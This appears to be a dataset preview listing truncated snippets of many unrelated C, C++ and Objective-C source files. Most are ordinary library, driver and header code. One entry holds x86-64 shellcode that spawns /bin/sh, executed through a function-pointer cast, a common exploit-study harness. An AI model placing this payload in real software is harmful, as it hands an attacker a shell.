text
stringlengths
6
1.35M
#include "cart.h" #define max_dis 2000 //define the maximum measured distance #define timeOut max_dis*60 //calculate timeout according to the maximum measured distance //function pulseIn: obtain pulse time of a pin int pulseIn(int pin, int level, int timeout); float getSonar(int trigPin, int echoPin){ //get the me...
// // UINavigationController+RVFullscreenPopGesture.h // vsp-vk-iOS // // Created by 蔡宇航 on 2022/1/12. // #import <UIKit/UIKit.h> NS_ASSUME_NONNULL_BEGIN @interface UINavigationController (RVFullscreenPopGesture) @end NS_ASSUME_NONNULL_END
/* * File: rtGetInf.h * * Code generated for Simulink model 'Mount_Drv_PDR2021'. * * Model version : 1.901 * Simulink Coder version : 9.0 (R2018b) 24-May-2018 * C/C++ source code generated on : Tue Aug 24 14:59:10 2021 * * Target selection: ert.tlc * Embedded hardware selection: Intel...
/* * Generated by asn1c-0.9.24 (http://lionet.info/asn1c) * From ASN.1 module "X2AP-IEs" * found in "/home/oainuc2/openairinterface5g/openair2/X2AP/MESSAGES/ASN1/R11.2/X2AP-IEs.asn" * `asn1c -gen-PER` */ #ifndef _X2ap_Pre_emptionVulnerability_H_ #define _X2ap_Pre_emptionVulnerability_H_ #include <asn_applicat...
/* Copyright 2011 Etay Meiri This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed...
/* * Copyright (c) 2001-2019, Arm Limited and Contributors. All rights reserved. * * SPDX-License-Identifier: BSD-3-Clause OR Arm's non-OSI source license * */ /*! @file @brief This file contains the definitions and APIs for Secure SRAM operations. This is a placeholder for platform-specific Secure SRAM imple...
/* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ #import <ABI39_0_0React/ABI39_0_0RCTShadowView.h> #import "ABI39_0_0RCTTextAttributes.h" NS_ASSUME_NONNULL_BEGIN extern NSString...
// This toolbox is licensed under the Academic Free License 3.0. // Instituto Tecnológico de Buenos Aires (ITBA). // Last modification: December 19th, 2012. #ifndef GRAPH_GENERATOR_H #define GRAPH_GENERATOR_H #include "../ComplexNets/typedefs.h" #include "../ComplexNets/MolloyReedGraphReader.h" using namespace std; ...
/* * Copyright (C) 2013 Google Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditio...
/* * Copyright (c) 2016 Mytchel Hammond <mytchel@openmailbox.org> * * Permission is hereby granted, free of charge, to any person * obtaining a copy of this software and associated documentation * files (the "Software"), to deal in the Software without * restriction, including without limitation the rights to us...
// // SDWebImageManager+Custom.h // weixindress // // Created by 杨帆 on 16/3/21. // Copyright © 2016年 www.jd.com. All rights reserved. // #import "SDWebImageManager.h" @interface SDWebImageManager (Custom) - (id <SDWebImageOperation>)customSwizzle_downloadImageWithURL:(NSURL *)url ...
/* $OpenBSD: eng_all.c,v 1.25 2014/06/12 15:49:29 deraadt Exp $ */ /* Written by Richard Levitte <richard@levitte.org> for the OpenSSL * project 2000. */ /* ==================================================================== * Copyright (c) 2000-2001 The OpenSSL Project. All rights reserved. * * Redistribution a...
/* crypto/des/des_enc.c */ /* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial ...
// Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_ #define COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_ #include <vector> #includ...
/* * CAST-256 * (C) 1999-2007 Jack Lloyd * * Botan is released under the Simplified BSD License (see license.txt) */ #ifndef BOTAN_CAST256_H__ #define BOTAN_CAST256_H__ #include <botan/block_cipher.h> namespace Botan { /** * CAST-256 */ class BOTAN_DLL CAST_256 final : public Block_Cipher_Fixed_Params<16, 4, 32, 4>...
// Copyright 2014 Intel Corporation. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_ #define OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_ #include "ui/base/cursor/ozone/cursor_factor...
// Lean compiler output // Module: Lean.Elab.Tactic.Match // Imports: Init Lean.Parser.Term Lean.Elab.Match Lean.Elab.Tactic.Basic Lean.Elab.Tactic.Induction #include <lean/lean.h> #if defined(__clang__) #pragma clang diagnostic ignored "-Wunused-parameter" #pragma clang diagnostic ignored "-Wunused-label" #elif define...
/* * This file is part of RTRlib. * * This file is subject to the terms and conditions of the MIT license. * See the file LICENSE in the top level directory for more details. * * Website: http://rtrlib.realmv6.org/ */ #include "rtr_private.h" #include "rtrlib/lib/log_private.h" #include "rtrlib/lib/utils_priva...
// Copyright (C) 2012 Davis E. King (davis@dlib.net) // License: Boost Software License See LICENSE.txt for the full license. #ifndef DLIB_INTERPOlATIONh_ #define DLIB_INTERPOlATIONh_ #include "interpolation_abstract.h" #include "../pixel.h" #include "../matrix.h" #include "assign_image.h" #include "image_pyramid....
/* Copyright (c) 2015,2016 Jeremy Iverson Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distrib...
// // FNFullImageAnimation.h // FNMarket // // Created by fuyong on 15/5/7. // Copyright (c) 2015年 cn.com.feiniu. All rights reserved. // #import <UIKit/UIKit.h> #import "FNBaseAnimatedTransitioning.h" @interface FNFullImageAnimation : FNBaseAnimatedTransitioning @property (nonatomic, strong) UIImage *image; @pr...
/* SPDX-License-Identifier: BSD-3-Clause */ #include <assert.h> #include <errno.h> #include <stdbool.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include "files.h" #include "log.h" #include "tpm2.h" #include "tpm2_alg_util.h" #include "tpm2_tool.h" typedef struct tpm_hmac_ctx tpm_hmac_ctx; struct t...
#ifndef COMMON_LIGHTING_H #define COMMON_LIGHTING_H static const float3 flWorldGridSize = float3( RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_XY, RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_XY, RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_Z ); static c...
#ifndef TREE_HEADER #define TREE_HEADER #include <stdio.h> #include <stdlib.h> #include <stdarg.h> typedef enum { typeCon, typeId, typeOpr, typeFunc} nodeEnum; typedef struct { int value; } conNodeType; typedef struct { int i; } idNodeType; typedef struct { char *name; } funcNodeType; typedef struct { int...
/* Generated by RuntimeBrowser Image: /System/Library/PrivateFrameworks/DoNotDisturbServer.framework/DoNotDisturbServer */ @interface DNDSSettingsRecord : NSObject <DNDSBackingStoreRecord, NSCopying, NSMutableCopying> { DNDSBehaviorSettingsRecord * _behaviorSettings; DNDSBypassSettingsRecord * _phoneCallBy...
/****************************************************************************** * @file startup_M451Series.c * @version V0.10 * $Revision: 11 $ * $Date: 15/09/02 10:02a $ * @brief CMSIS Cortex-M4 Core Peripheral Access Layer Source File for M451 Series MCU * * @note * Copyright (C) 2013~2015 Nuvoton Tec...
// Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef REF_PTR_TO_GC_MANAGED_CLASS_H_ #define REF_PTR_TO_GC_MANAGED_CLASS_H_ #include "heap/stubs.h" namespace WebCore { class HeapObject; class Part...
/* ----------------------------------------------------------------------------- This source file is part of OGRE (Object-oriented Graphics Rendering Engine) For the latest info, see http://www.ogre3d.org/ Copyright (c) 2000-2014 Torus Knot Software Ltd Permission is hereby granted, free of charge, to any person ...
/*========================================================================= Program: Visualization Toolkit Module: vtkEdgeLayoutStrategy.h Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen All rights reserved. See Copyright.txt or http://www.kitware.com/Copyright.htm for details. This softw...
// Copyright (c) 2009-2010 Satoshi Nakamoto // Copyright (c) 2009-2012 The Bitcoin developers // Distributed under the MIT/X11 software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef __cplusplus # error This header can only be compiled as C++. #endif #ifnd...
/***************************************************************************//** * @file displayls013b7dh03config.h * @brief BRD4104A specific configuration for the display driver for * the Sharp Memory LCD model LS013B7DH03. * @version 5.6.0 *****************************************************************...
/* \file * \author Chris Bradley * \brief This file contains system level routines. * * \section LICENSE * * Version: MPL 1.1/GPL 2.0/LGPL 2.1 * * The contents of this file are subject to the Mozilla Public License * Version 1.1 (the "License"); you may not use this file except in * compliance with the Licens...
/* * %CopyrightBegin% * * Copyright Ericsson AB 1998-2020. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 ...
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_memcmp.c :+: :+: :+: ...
/* * SPDX-License-Identifier: MIT * * Copyright © 2018 Intel Corporation * * Autogenerated file by GPU Top : https://github.com/rib/gputop * DO NOT EDIT manually! */ #include <linux/sysfs.h> #include "i915_drv.h" #include "i915_oa_sklgt3.h" static const struct i915_oa_reg b_counter_config_test_oa[] = { { _MM...
/* * This file belongs to the Galois project, a C++ library for exploiting * parallelism. The code is being released under the terms of the 3-Clause BSD * License (a copy is located in LICENSE.txt at the top-level directory). * * Copyright (C) 2018, The University of Texas at Austin. All rights reserved. * UNIVER...
/* Coin sums * Finds the possible ways to give 2 pounds * Konstantinos Ameranis 15.11.2013 */ #include <stdio.h> #define BALANCE 200 #define int long int int coins(int balance, int *values, int index); int main() { int values[] = {200, 100, 50, 20, 10, 5, 2, 1}; printf("%ld\n", coins(BALANCE, values, 0));...
#include <unistd.h> char shellcode[] = "\x48\x31\xd2\x48\x31\xf6\x48\xbf" "\x2f\x62\x69\x6e\x2f\x73\x68\x11" "\x48\xc1\xe7\x08\x48\xc1\xef\x08" "\x57\x48\x89\xe7\x48\xb8\x3b\x11" "\x11\x11\x11\x11\x11\x11\x48\xc1" "\xe0\x38\x48\xc1\xe8\x38\x0f\x05"; int main(int argc, char ** argv) { void (*fp)(); fp...
// Copyright (C) 2002-2012 Nikolaus Gebhardt // This file is part of the "Irrlicht Engine". // For conditions of distribution and use, see copyright notice in irrlicht.h #ifndef __E_MATERIAL_TYPES_H_INCLUDED__ #define __E_MATERIAL_TYPES_H_INCLUDED__ namespace irr { namespace video { //! Abstracted and e...
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/route53resolver/Route53Resolver_EXPORTS.h> #include <aws/route53resolver/Route53ResolverErrors.h> #include <aws/core/client/AWSError.h> #include <aws/core/client/ClientConfi...
/** @file bt_main.c * * @brief This file contains the major functions in BlueTooth * driver. It includes init, exit, open, close and main * thread etc.. * * Copyright (C) 2007-2013, Marvell International Ltd. * * This software file (the "File") is distributed by Marvell International * Ltd. under the ...
/* * Souffle - A Datalog Compiler * Copyright (c) 2013, 2015, Oracle and/or its affiliates. All rights reserved * Licensed under the Universal Permissive License v 1.0 as shown at: * - https://opensource.org/licenses/UPL * - <souffle root>/licenses/SOUFFLE-UPL.txt */ /********************************************...
/* $FreeBSD: src/sys/netipsec/key.c,v 1.3.2.1 2003/01/24 05:11:35 sam Exp $ */ /* $KAME: key.c,v 1.191 2001/06/27 10:46:49 sakane Exp $ */ /* * Copyright (C) 1995, 1996, 1997, and 1998 WIDE Project. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are p...
/* * Copyright (c) 2021 Huawei Device Co., Ltd. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law ...
#pragma once // mode variable for each HID (human input device) // keyboard: [MODE1]: OS events (default) [MODE2]: manual update() NA in linux [MODE3]: directinput [MODE4]: windows raw data(NA) // mouse: [MODE1]: OS events (default) [MODE2]: manual update() using different funcs [MODE3]: ...
// SPDX-License-Identifier: GPL-2.0+ /* * Copyright (C) 2003-2008 Takahiro Hirofuchi * Copyright (C) 2015 Nobuo Iwata */ #include <linux/kthread.h> #include <linux/export.h> #include <linux/slab.h> #include <linux/workqueue.h> #include "usbip_common.h" struct usbip_event { struct list_head node; struct usbip_de...
// // ImageProcessingProtocol.h // Tesseract BizScanner // // Created by Abhilash S T P on 4/4/14. // Copyright (c) 2014 Abhilash S T P. All rights reserved. // #import <Foundation/Foundation.h> @protocol ImageProcessingProtocol <NSObject> - (UIImage*) processImage:(UIImage*) src; - (NSString*) pathToLangugeFIle;...
// // AdMoGoInterstitialManager.h // AdsMogo // // Created by Daxiong on 14-4-28. // // #import "AdMoGoInterstitial.h" #import <Foundation/Foundation.h> @interface AdMoGoInterstitialManager : NSObject + (void)setAppKey:(NSString *)key; + (void)setRootViewController:(UIViewController *)rvc; + (void)setDefaultDeleg...
/* * This header is generated by classdump-dyld 1.0 * on Sunday, June 7, 2020 at 11:23:47 AM Mountain Standard Time * Operating System: Version 13.4.5 (Build 17L562) * Image Source: /System/Library/Frameworks/MapKit.framework/MapKit * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. */ ...
/* * The Clear BSD License * Copyright (c) 2015, Freescale Semiconductor, Inc. * Copyright 2016 NXP * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted (subject to the limitations in the disclaimer below) provided * that the following condi...
// Copyright 2007, Google Inc. // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions ...
/* * Copyright (c) 2010 Broadcom Corporation * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHO...
/** ****************************************************************************** * @file stm32f1xx_hal_conf.h * @brief HAL configuration file. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2019 STMicroelectronics</cen...
/* * PSP Software Development Kit - https://github.com/pspdev * ----------------------------------------------------------------------- * Licensed under the BSD license, see LICENSE in PSPSDK root for details. * * psputility_modules.h - Load modules from user mode * * Copyright (c) 2008 David Perry <tias_dp@hotm...
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or a...
/* * This header is generated by classdump-dyld 1.0 * on Sunday, September 27, 2020 at 11:54:43 AM Mountain Standard Time * Operating System: Version 14.0 (Build 18A373) * Image Source: /System/Library/PrivateFrameworks/MessageSecurity.framework/MessageSecurity * classdump-dyld is licensed under GPLv3, Copyright © 2013...
// // QJCTabBarController.h // singdemo // // Created by MYMAc on 2018/7/21. // Copyright © 2018年 ShangYu. All rights reserved. // #import <UIKit/UIKit.h> @interface QJCTabBarController : UITabBarController @end
#ifndef __PN532_INTERFACE_H__ #define __PN532_INTERFACE_H__ #include <stdint.h> #define PN532_PREAMBLE (0x00) #define PN532_STARTCODE1 (0x00) #define PN532_STARTCODE2 (0xFF) #define PN532_POSTAMBLE (0x00) #define PN532_HOSTTOPN532 (0xD4) #define PN...
#ifndef KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H #define KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H #include <QObject> #include <QTest> class AddressBookTests : public QObject { Q_OBJECT private Q_SLOTS: void addressBookTests(); }; #endif // KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H
#ifndef AUDIOVISUALIZATION_H_ #define AUDIOVISUALIZATION_H_ #include "main.h" #include "tim.h" #include "arm_math.h" #include "ringBuffer.h" #include "Device.h" #include "feature_extraction.h" #include "NN.h" #include "NN_Detection.h" #define NN_AUDIO_BUFFER_SIZE 3072U #define AUDIO_PROCESSING_BUFFER_SIZE 2048U #def...
#ifndef COLORPICKER_H #define COLORPICKER_H #include <QWidget> #include <QScopedPointer> #include <QMap> #include <QEventLoop> #include <QPointer> namespace Ui { class ColorPicker; }; #include "AbstractColorPicker.h" class EyeDropper; class ColorPicker : public AbstractColorPicker { Q_OBJECT private: type...
#include "types.h" #include "param.h" #include "memlayout.h" #include "riscv.h" #include "spinlock.h" #include "proc.h" #include "defs.h" struct cpu cpus[NCPU]; struct proc proc[NPROC]; struct proc *initproc; int nextpid = 1; struct spinlock pid_lock; extern void forkret(void); static void wakeup1(struct proc *cha...
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * resarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you ...
/* pybind11/operator.h: Metatemplates for operator overloading Copyright (c) 2016 Wenzel Jakob <wenzel.jakob@epfl.ch> All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. */ #pragma once #include "pybind11.h" #if defined(__clang__) &...
/** * Autogenerated by Thrift Compiler (0.12.0) * * DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING * @generated */ #ifndef client_TYPES_V2H #define client_TYPES_V2H #include <iosfwd> #include <thrift/Thrift.h> #include <thrift/TApplicationException.h> #include <thrift/TBase.h> #include <thrift...
//////////////////////////////////////////////////////////////////////// // // Copyright 2014 PMC-Sierra, Inc. // // This program is free software; you can redistribute it and/or // modify it under the terms of the GNU General Public License // as published by the Free Software Foundation; either version 2 // of the Li...
#pragma once #include "GameTypes.h" #include "PapyrusArgs.h" class TESObjectREFR; class TESForm; class EnchantmentItem; class VMClassRegistry; class EffectSetting; class BGSListForm; namespace papyrusObjectReference { void RegisterFuncs(VMClassRegistry* registry); UInt32 GetNumItems(TESObjectREFR* p...
/* Copyright (C) 1996-2016 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the ...
// Copyright 2017 The Fuchsia Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include <fcntl.h> #include <launchpad/launchpad.h> #include <zircon/syscalls.h> #include <zircon/status.h> #include <lib/fdio/io.h> #include <stdio.h> #in...
/** ****************************************************************************** * @file EXTI/EXTI_Example/stm32f4xx_it.h * @author MCD Application Team * @version V1.1.0 * @date 18-January-2013 * @brief This file contains the headers of the interrupt handlers. ********************************...
/** * @file * * @author jeffrey.daily@gmail.com * * Copyright (c) 2015 Battelle Memorial Institute. */ #include "config.h" #include <stdint.h> #include <stdlib.h> #if defined(_MSC_VER) #include <intrin.h> #else #include <emmintrin.h> #endif #include "parasail.h" #include "parasail/memory.h" #include "parasail/...
/* * Copyright (c) 2003-2020 Rony Shapiro <ronys@pwsafe.org>. * All rights reserved. Use of the code is allowed under the * Artistic License 2.0 terms, as specified in the LICENSE file * distributed with this code, or available from * http://www.opensource.org/licenses/artistic-license-2.0.php */ /** * \file St...
// Copyright (c) 2020 The Globaltoken Core developers // Distributed under the MIT software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef BITCOIN_RPC_TREASURY_H #define BITCOIN_RPC_TREASURY_H #include <stdint.h> #include <script/standard.h> class UniValue...
/* * [origin: Linux kernel arch/arm/mach-at91/include/mach/at91_pmc.h] * * Copyright (C) 2005 Ivan Kokshaysky * Copyright (C) SAN People * Copyright (C) 2009 Jens Scharsig (js_at_ng@scharsoft.de) * * Power Management Controller (PMC) - System peripherals registers. * Based on AT91RM9200 datasheet revision E. *...
/* UNIX V7 source code: see /COPYRIGHT or www.tuhs.org for details. */ /* Changes: Copyright (c) 1999 Robert Nordier. All rights reserved. */ # /* * UNIX shell * * S. R. Bourne * Bell Telephone Laboratories * */ #include "defs.h" STKPTR stakbot=nullstr; /* ======== storage allocation ======== */ STKPTR ge...
/* * Copyright (c) 2018 IOTA Stiftung * https://github.com/iotaledger/entangled * * Refer to the LICENSE file for licensing information */ #include <unity/unity.h> #include "ciri/api/api.h" #include "ciri/consensus/test_utils/bundle.h" #include "ciri/consensus/test_utils/tangle.h" #include "ciri/node/node.h" #in...
#include <stdio.h> #include <stdlib.h> #include <string.h> char id_buku[5][2] = {"A1", "A2", "A3", "A4", "A5"}; char jenis[5][100] = {"Pemrograman", "Sastra Jepang", "Teknologi", "Matematika", "Sains & physics"}; char judul[5][100] = {"Trick for C++", "Katakana & Kanji 2", "Cisco Networking", "Statistika jilid 2...
// // IntangibleAssets+CalculationBalance.h // BSTally // // Created by junhong.zhu@lachesis-mh.com on 16/8/9. // Copyright © 2016年 Danyow.Ed. All rights reserved. // #import "IntangibleAssets.h" @interface IntangibleAssets (CalculationBalance) - (void)calculationBalanceWithSingleDetail:(Detail *)singleDetail is...
// Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. #pragma once #include "Editor/Sequencer/Public/MovieSceneTrackEditor.h" class IPropertyHandle; class F2DTransformTrackEditor : public FMovieSceneTrackEditor { public: /** * Constructor * * @param InSequencer The sequencer instance to be used by thi...
// // MOPUBNativeVideoAdAdapter.h // Copyright (c) 2015 MoPub. All rights reserved. // #import "MPNativeAdAdapter.h" @interface MOPUBNativeVideoAdAdapter : NSObject <MPNativeAdAdapter> @property (nonatomic, weak) id<MPNativeAdAdapterDelegate> delegate; @property (nonatomic, readonly) NSArray *impressionTrackerURLs...
/** @file @author Shin'ichiro Nakaoka */ #ifndef CNOID_UTIL_MULTI_SE3_SEQ_H #define CNOID_UTIL_MULTI_SE3_SEQ_H #include "MultiSeq.h" #include "EigenTypes.h" #include "exportdecl.h" namespace cnoid { class Mapping; class Listing; class YAMLWriter; class CNOID_EXPORT MultiSE3Seq : public MultiSeq<SE3, ...
/* * sr.c: ipv6 segment routing * * Copyright (c) 2013 Cisco and/or its affiliates. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 ...
/* * Copyright (c) 2017 Trail of Bits, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law o...